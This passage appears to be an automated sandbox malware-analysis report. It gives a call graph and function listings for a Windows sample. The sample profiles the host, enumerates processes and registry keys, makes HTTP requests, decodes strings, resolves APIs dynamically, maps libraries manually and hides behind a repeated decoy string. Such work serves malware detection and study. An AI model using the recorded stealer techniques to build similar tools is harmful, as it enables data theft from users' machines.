API calls 15482->15483 15484 b82568 15483->15484 15485 b8a920 3 API calls 15484->15485 15486 b8257b 15485->15486 15487 b8a8a0 lstrcpy 15486->15487 15488 b82584 15487->15488 15489 b8a9b0 4 API calls 15488->15489 15490 b825ae 15489->15490 15491 b8a8a0 lstrcpy 15490->15491 15492 b825b7 15491->15492 15493 b8a9b0 4 API calls 15492->15493 15494 b825d6 15493->15494 15495 b8a8a0 lstrcpy 15494->15495 15496 b825df 15495->15496 15497 b8a9b0 4 API calls 15496->15497 15498 b82600 15497->15498 15499 b8a8a0 lstrcpy 15498->15499 15500 b82609 15499->15500 16046 b88680 15500->16046 15502 b82620 15503 b8a920 3 API calls 15502->15503 15504 b82633 15503->15504 15505 b8a8a0 lstrcpy 15504->15505 15506 b8263c 15505->15506 15507 b8265a lstrlen 15506->15507 15508 b8266a 15507->15508 15509 b8a740 lstrcpy 15508->15509 15510 b8267c 15509->15510 15511 b71590 lstrcpy 15510->15511 15512 b8268d 15511->15512 16056 b85190 15512->16056 15514 b82699 15514->13946 16244 b8aad0 15515->16244 15517 b75009 InternetOpenUrlA 15520 b75021 15517->15520 15518 b750a0 InternetCloseHandle InternetCloseHandle 15521 b750ec 15518->15521 15519 b7502a InternetReadFile 15519->15520 15520->15518 15520->15519 15521->13950 16245 b798d0 15522->16245 15524 b80759 15525 b80a38 15524->15525 15526 b8077d 15524->15526 15527 b71590 lstrcpy 15525->15527 15528 b80799 StrCmpCA 15526->15528 15529 b80a49 15527->15529 15530 b807a8 15528->15530 15531 b80843 15528->15531 16421 b80250 15529->16421 15534 b8a7a0 lstrcpy 15530->15534 15535 b80865 StrCmpCA 15531->15535 15536 b807c3 15534->15536 15537 b80874 15535->15537 15574 b8096b 15535->15574 15538 b71590 lstrcpy 15536->15538 15539 b8a740 lstrcpy 15537->15539 15540 b8080c 15538->15540 15542 b80881 15539->15542 15543 b8a7a0 lstrcpy 15540->15543 15541 b8099c StrCmpCA 15544 b809ab 15541->15544 15563 b80a2d 15541->15563 15545 b8a9b0 4 API calls 15542->15545 15546 b80823 15543->15546 15547 b71590 lstrcpy 15544->15547 15548 b808ac 15545->15548 15549 b8a7a0 lstrcpy 15546->15549 15550 b809f4 15547->15550 15551 b8a920 3 API calls 15548->15551 15552 b8083e 15549->15552 15554 b8a7a0 lstrcpy 15550->15554 15555 b808b3 15551->15555 16248 b7fb00 15552->16248 15556 b80a0d 15554->15556 15557 b8a9b0 4 API calls 15555->15557 15558 b8a7a0 lstrcpy 15556->15558 15559 b808ba 15557->15559 15560 b80a28 15558->15560 15561 b8a8a0 lstrcpy 15559->15561 16364 b80030 15560->16364 15563->13954 15574->15541 15896 b8a7a0 lstrcpy 15895->15896 15897 b71683 15896->15897 15898 b8a7a0 lstrcpy 15897->15898 15899 b71695 15898->15899 15900 b8a7a0 lstrcpy 15899->15900 15901 b716a7 15900->15901 15902 b8a7a0 lstrcpy 15901->15902 15903 b715a3 15902->15903 15903->14777 15905 b747c6 15904->15905 15906 b74838 lstrlen 15905->15906 15930 b8aad0 15906->15930 15908 b74848 InternetCrackUrlA 15909 b74867 15908->15909 15909->14854 15911 b8a740 lstrcpy 15910->15911 15912 b88b74 15911->15912 15913 b8a740 lstrcpy 15912->15913 15914 b88b82 GetSystemTime 15913->15914 15916 b88b99 15914->15916 15915 b8a7a0 lstrcpy 15917 b88bfc 15915->15917 15916->15915 15917->14869 15919 b8a931 15918->15919 15920 b8a988 15919->15920 15923 b8a968 lstrcpy lstrcat 15919->15923 15921 b8a7a0 lstrcpy 15920->15921 15922 b8a994 15921->15922 15922->14872 15923->15920 15924->14987 15926 b74eee 15925->15926 15927 b79af9 LocalAlloc 15925->15927 15926->14875 15926->14877 15927->15926 15928 b79b14 CryptStringToBinaryA 15927->15928 15928->15926 15929 b79b39 LocalFree 15928->15929 15929->15926 15930->15908 15931->14997 15932->15138 15933->15140 15934->15148 16063 b877a0 15935->16063 15938 b81c1e 15938->15230 15939 b876c6 RegOpenKeyExA 15940 b87704 RegCloseKey 15939->15940 15941 b876e7 RegQueryValueExA 15939->15941 15940->15938 15941->15940 15943 b81c99 15942->15943 15943->15244 15945 b81e09 15944->15945 15945->15286 15947 b87a9a wsprintfA 15946->15947 15948 b81e84 15946->15948 15947->15948 15948->15300 15950 b87b4d 15949->15950 15951 b81efe 15949->15951 16070 b88d20 LocalAlloc CharToOemW 15950->16070 15951->15314 15954 b8a740 lstrcpy 15953->15954 15955 b87bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15954->15955 15956 b87c25 15955->15956 15957 b87d18 15956->15957 15958 b87c46 GetLocaleInfoA 15956->15958 15961 b8a9b0 lstrcpy lstrlen lstrcpy lstrcat 15956->15961 15964 b8a8a0 lstrcpy 15956->15964 15959 b87d28 15957->15959 15960 b87d1e LocalFree 15957->15960 15958->15956 15962 b8a7a0 lstrcpy 15959->15962 15960->15959 15961->15956 15963 b87d37 15962->15963 15963->15327 15964->15956 15966 b82008 15965->15966 15966->15342 15968 b89493 GetModuleFileNameExA CloseHandle 15967->15968 15969 b894b5 15967->15969 15968->15969 15970 b8a740 lstrcpy 15969->15970 15971 b82091 15970->15971 15971->15357 15973 b87e68 RegQueryValueExA 15972->15973 15974 b82119 15972->15974 15975 b87e8e RegCloseKey 15973->15975 15974->15371 15975->15974 15977 b87fb9 GetLogicalProcessorInformationEx 15976->15977 15978 b87fd8 GetLastError 15977->15978 15979 b88029 15977->15979 15987 b88022 15978->15987 15988 b87fe3 15978->15988 15983 b889f0 2 API calls 15979->15983 15982 b889f0 2 API calls 15984 b82194 15982->15984 15985 b8807b 15983->15985 15984->15385 15986 b88084 wsprintfA 15985->15986 15985->15987 15986->15984 15987->15982 15987->15984 15988->15977 15988->15984 16071 b889f0 15988->16071 16074 b88a10 GetProcessHeap RtlAllocateHeap 15988->16074 15990 b8220f 15989->15990 15990->15399 15992 b889b0 15991->15992 15993 b8814d GlobalMemoryStatusEx 15992->15993 15995 b88163 __aulldiv 15993->15995 15994 b8819b wsprintfA 15996 b82289 15994->15996 15995->15994 15996->15413 15998 b887fb GetProcessHeap RtlAllocateHeap wsprintfA 15997->15998 16000 b8a740 lstrcpy 15998->16000 16001 b8230b 16000->16001 16001->15427 16003 b8a740 lstrcpy 16002->16003 16009 b88229 16003->16009 16004 b88263 16006 b8a7a0 lstrcpy 16004->16006 16005 b8a9b0 lstrcpy lstrlen lstrcpy lstrcat 16005->16009 16007 b882dc 16006->16007 16007->15444 16008 b8a8a0 lstrcpy 16008->16009 16009->16004 16009->16005 16009->16008 16011 b8a740 lstrcpy 16010->16011 16012 b8835c RegOpenKeyExA 16011->16012 16013 b883ae 16012->16013 16014 b883d0 16012->16014 16015 b8a7a0 lstrcpy 16013->16015 16016 b883f8 RegEnumKeyExA 16014->16016 16017 b88613 RegCloseKey 16014->16017 16026 b883bd 16015->16026 16018 b8860e 16016->16018 16019 b8843f wsprintfA RegOpenKeyExA 16016->16019 16020 b8a7a0 lstrcpy 16017->16020 16018->16017 16021 b884c1 RegQueryValueExA 16019->16021 16022 b88485 RegCloseKey RegCloseKey 16019->16022 16020->16026 16024 b884fa lstrlen 16021->16024 16025 b88601 RegCloseKey 16021->16025 16023 b8a7a0 lstrcpy 16022->16023 16023->16026 16024->16025 16027 b88510 16024->16027 16025->16018 16026->15470 16028 b8a9b0 4 API calls 16027->16028 16029 b88527 16028->16029 16030 b8a8a0 lstrcpy 16029->16030 16031 b88533 16030->16031 16032 b8a9b0 4 API calls 16031->16032 16033 b88557 16032->16033 16034 b8a8a0 lstrcpy 16033->16034 16035 b88563 16034->16035 16036 b8856e RegQueryValueExA 16035->16036 16036->16025 16037 b885a3 16036->16037 16038 b8a9b0 4 API calls 16037->16038 16039 b885ba 16038->16039 16040 b8a8a0 lstrcpy 16039->16040 16041 b885c6 16040->16041 16042 b8a9b0 4 API calls 16041->16042 16043 b885ea 16042->16043 16044 b8a8a0 lstrcpy 16043->16044 16045 b885f6 16044->16045 16045->16025 16047 b8a740 lstrcpy 16046->16047 16048 b886bc CreateToolhelp32Snapshot Process32First 16047->16048 16049 b886e8 Process32Next 16048->16049 16050 b8875d CloseHandle 16048->16050 16049->16050 16055 b886fd 16049->16055 16051 b8a7a0 lstrcpy 16050->16051 16053 b88776 16051->16053 16052 b8a9b0 lstrcpy lstrlen lstrcpy lstrcat 16052->16055 16053->15502 16054 b8a8a0 lstrcpy 16054->16055 16055->16049 16055->16052 16055->16054 16057 b8a7a0 lstrcpy 16056->16057 16058 b851b5 16057->16058 16059 b71590 lstrcpy 16058->16059 16060 b851c6 16059->16060 16075 b75100 16060->16075 16062 b851cf 16062->15514 16066 b87720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 16063->16066 16065 b876b9 16065->15938 16065->15939 16067 b87780 RegCloseKey 16066->16067 16068 b87765 RegQueryValueExA 16066->16068 16069 b87793 16067->16069 16068->16067 16069->16065 16070->15951 16072 b889f9 GetProcessHeap HeapFree 16071->16072 16073 b88a0c 16071->16073 16072->16073 16073->15988 16074->15988 16076 b8a7a0 lstrcpy 16075->16076 16077 b75119 16076->16077 16078 b747b0 2 API calls 16077->16078 16079 b75125 16078->16079 16235 b88ea0 16079->16235 16081 b75184 16082 b75192 lstrlen 16081->16082 16083 b751a5 16082->16083 16084 b88ea0 4 API calls 16083->16084 16085 b751b6 16084->16085 16086 b8a740 lstrcpy 16085->16086 16087 b751c9 16086->16087 16088 b8a740 lstrcpy 16087->16088 16089 b751d6 16088->16089 16090 b8a740 lstrcpy 16089->16090 16091 b751e3 16090->16091 16092 b8a740 lstrcpy 16091->16092 16093 b751f0 16092->16093 16094 b8a740 lstrcpy 16093->16094 16095 b751fd InternetOpenA StrCmpCA 16094->16095 16096 b7522f 16095->16096 16097 b758c4 InternetCloseHandle 16096->16097 16098 b88b60 3 API calls 16096->16098 16104 b758d9 ctype 16097->16104 16099 b7524e 16098->16099 16100 b8a920 3 API calls 16099->16100 16101 b75261 16100->16101 16102 b8a8a0 lstrcpy 16101->16102 16103 b7526a 16102->16103 16105 b8a9b0 4 API calls 16103->16105 16108 b8a7a0 lstrcpy 16104->16108 16106 b752ab 16105->16106 16107 b8a920 3 API calls 16106->16107 16109 b752b2 16107->16109 16116 b75913 16108->16116 16110 b8a9b0 4 API calls 16109->16110 16111 b752b9 16110->16111 16112 b8a8a0 lstrcpy 16111->16112 16113 b752c2 16112->16113 16114 b8a9b0 4 API calls 16113->16114 16115 b75303 16114->16115 16117 b8a920 3 API calls 16115->16117 16116->16062 16118 b7530a 16117->16118 16119 b8a8a0 lstrcpy 16118->16119 16120 b75313 16119->16120 16121 b75329 InternetConnectA 16120->16121 16121->16097 16122 b75359 HttpOpenRequestA 16121->16122 16124 b758b7 InternetCloseHandle 16122->16124 16125 b753b7 16122->16125 16124->16097 16126 b8a9b0 4 API calls 16125->16126 16127 b753cb 16126->16127 16128 b8a8a0 lstrcpy 16127->16128 16129 b753d4 16128->16129 16130 b8a920 3 API calls 16129->16130 16131 b753f2 16130->16131 16132 b8a8a0 lstrcpy 16131->16132 16133 b753fb 16132->16133 16134 b8a9b0 4 API calls 16133->16134 16135 b7541a 16134->16135 16136 b8a8a0 lstrcpy 16135->16136 16137 b75423 16136->16137 16138 b8a9b0 4 API calls 16137->16138 16139 b75444 16138->16139 16140 b8a8a0 lstrcpy 16139->16140 16141 b7544d 16140->16141 16142 b8a9b0 4 API calls 16141->16142 16143 b7546e 16142->16143 16236 b88ead CryptBinaryToStringA 16235->16236 16238 b88ea9 16235->16238 16237 b88ece GetProcessHeap RtlAllocateHeap 16236->16237 16236->16238 16237->16238 16239 b88ef4 ctype 16237->16239 16238->16081 16240 b88f05 CryptBinaryToStringA 16239->16240 16240->16238 16244->15517 16487 b79880 16245->16487 16247 b798e1 16247->15524 16249 b8a740 lstrcpy 16248->16249 16422 b8a740 lstrcpy 16421->16422 16423 b80266 16422->16423 16424 b88de0 2 API calls 16423->16424 16425 b8027b 16424->16425 16426 b8a920 3 API calls 16425->16426 16427 b8028b 16426->16427 16428 b8a8a0 lstrcpy 16427->16428 16429 b80294 16428->16429 16430 b8a9b0 4 API calls 16429->16430 16488 b7988d 16487->16488 16491 b76fb0 16488->16491 16490 b798ad ctype 16490->16247 16494 b76d40 16491->16494 16495 b76d63 16494->16495 16509 b76d59 16494->16509 16510 b76530 16495->16510 16499 b76dbe 16499->16509 16520 b769b0 16499->16520 16501 b76e2a 16502 b76ee6 VirtualFree 16501->16502 16504 b76ef7 16501->16504 16501->16509 16502->16504 16503 b76f41 16505 b889f0 2 API calls 16503->16505 16503->16509 16504->16503 16506 b76f26 FreeLibrary 16504->16506 16507 b76f38 16504->16507 16505->16509 16506->16504 16508 b889f0 2 API calls 16507->16508 16508->16503 16509->16490 16511 b76542 16510->16511 16513 b76549 16511->16513 16530 b88a10 GetProcessHeap RtlAllocateHeap 16511->16530 16513->16509 16514 b76660 16513->16514 16515 b7668f VirtualAlloc 16514->16515 16517 b76730 16515->16517 16519 b7673c 16515->16519 16518 b76743 VirtualAlloc 16517->16518 16517->16519 16518->16519 16519->16499 16521 b769c9 16520->16521 16525 b769d5 16520->16525 16522 b76a09 LoadLibraryA 16521->16522 16521->16525 16523 b76a32 16522->16523 16522->16525 16527 b76ae0 16523->16527 16531 b88a10 GetProcessHeap RtlAllocateHeap 16523->16531 16525->16501 16526 b76ba8 GetProcAddress 16526->16525 16526->16527 16527->16525 16527->16526 16528 b889f0 2 API calls 16528->16527 16529 b76a8b 16529->16525 16529->16528 16530->16513 16531->16529

                                Executed Functions

                                Function 00B89860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 660 b89860-b89874 call b89750 663 b8987a-b89a8e call b89780 GetProcAddress * 21 660->663 664 b89a93-b89af2 LoadLibraryA * 5 660->664 663->664 666 b89b0d-b89b14 664->666 667 b89af4-b89b08 GetProcAddress 664->667 669 b89b46-b89b4d 666->669 670 b89b16-b89b41 GetProcAddress * 2 666->670 667->666 671 b89b68-b89b6f 669->671 672 b89b4f-b89b63 GetProcAddress 669->672 670->669 673 b89b89-b89b90 671->673 674 b89b71-b89b84 GetProcAddress 671->674 672->671 675 b89bc1-b89bc2 673->675 676 b89b92-b89bbc GetProcAddress * 2 673->676 674->673 676->675
                                APIs
                                • GetProcAddress.KERNEL32(75550000,009306D8), ref: 00B898A1
                                • GetProcAddress.KERNEL32(75550000,009306A8), ref: 00B898BA
                                • GetProcAddress.KERNEL32(75550000,009306C0), ref: 00B898D2
                                • GetProcAddress.KERNEL32(75550000,009306F0), ref: 00B898EA
                                • GetProcAddress.KERNEL32(75550000,009307B0), ref: 00B89903
                                • GetProcAddress.KERNEL32(75550000,00938890), ref: 00B8991B
                                • GetProcAddress.KERNEL32(75550000,00926600), ref: 00B89933
                                • GetProcAddress.KERNEL32(75550000,009264C0), ref: 00B8994C
                                • GetProcAddress.KERNEL32(75550000,00930558), ref: 00B89964
                                • GetProcAddress.KERNEL32(75550000,00930708), ref: 00B8997C
                                • GetProcAddress.KERNEL32(75550000,00930840), ref: 00B89995
                                • GetProcAddress.KERNEL32(75550000,00930720), ref: 00B899AD
                                • GetProcAddress.KERNEL32(75550000,009262E0), ref: 00B899C5
                                • GetProcAddress.KERNEL32(75550000,00930768), ref: 00B899DE
                                • GetProcAddress.KERNEL32(75550000,009307C8), ref: 00B899F6
                                • GetProcAddress.KERNEL32(75550000,009264E0), ref: 00B89A0E
                                • GetProcAddress.KERNEL32(75550000,00930798), ref: 00B89A27
                                • GetProcAddress.KERNEL32(75550000,00930870), ref: 00B89A3F
                                • GetProcAddress.KERNEL32(75550000,00926640), ref: 00B89A57
                                • GetProcAddress.KERNEL32(75550000,00930888), ref: 00B89A70
                                • GetProcAddress.KERNEL32(75550000,009265E0), ref: 00B89A88
                                • LoadLibraryA.KERNEL32(00930918,?,00B86A00), ref: 00B89A9A
                                • LoadLibraryA.KERNEL32(00930858,?,00B86A00), ref: 00B89AAB
                                • LoadLibraryA.KERNEL32(009308D0,?,00B86A00), ref: 00B89ABD
                                • LoadLibraryA.KERNEL32(009308B8,?,00B86A00), ref: 00B89ACF
                                • LoadLibraryA.KERNEL32(009308A0,?,00B86A00), ref: 00B89AE0
                                • GetProcAddress.KERNEL32(75670000,009308E8), ref: 00B89B02
                                • GetProcAddress.KERNEL32(75750000,00930900), ref: 00B89B23
                                • GetProcAddress.KERNEL32(75750000,00938C40), ref: 00B89B3B
                                • GetProcAddress.KERNEL32(76BE0000,00938EC8), ref: 00B89B5D
                                • GetProcAddress.KERNEL32(759D0000,00926540), ref: 00B89B7E
                                • GetProcAddress.KERNEL32(773F0000,00938900), ref: 00B89B9F
                                • GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 00B89BB6
                                Strings
                                • NtQueryInformationProcess, xrefs: 00B89BAA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: d412fc0c818ed6fe5e11a68cc3e782423b6e5fbb5f5d85677b06bc90dbeb55b9
                                • Instruction ID: 1445ab9dbef7a9c9b63b5940a5123a4f0c1f6b523cab74bdd47be5119cdb3055
                                • Opcode Fuzzy Hash: d412fc0c818ed6fe5e11a68cc3e782423b6e5fbb5f5d85677b06bc90dbeb55b9
                                • Instruction Fuzzy Hash: 27A12AB9508340EFD754EFACED88A663BF9F74C301794471AA609C3764DA3A9841CB72
                                Function 00B745C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 764 b745c0-b74695 RtlAllocateHeap 781 b746a0-b746a6 764->781 782 b7474f-b747a9 VirtualProtect 781->782 783 b746ac-b7474a 781->783 783->781
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B7460F
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00B7479C
                                Strings
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B7466D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B746CD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B745E8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B7475A
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B74678
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B74638
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B745DD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B74683
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B745D2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B7462D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B7471E
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B74662
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B745C7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B74729
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B7474F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B74765
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B746D8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B7477B
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B74657
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B74622
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B7473F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B74643
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B746AC
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B746C2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B74734
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B746B7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B745F3
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B74617
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B74713
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B74770
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United 